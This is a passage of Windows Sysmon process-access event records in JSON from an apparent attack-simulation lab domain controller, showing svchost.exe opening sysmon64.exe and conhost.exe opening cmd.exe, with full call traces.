06:51:51.764","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3993,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.764\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.764","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3994,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.764\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.764","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3995,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.764\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.764","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3996,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.764\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.764","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3997,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.764\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.764","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3998,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.764\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.764","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3999,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.764\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.764","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4000,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.764\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001021C00500}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.764","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001021C00500}","TargetProcessId":"872","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
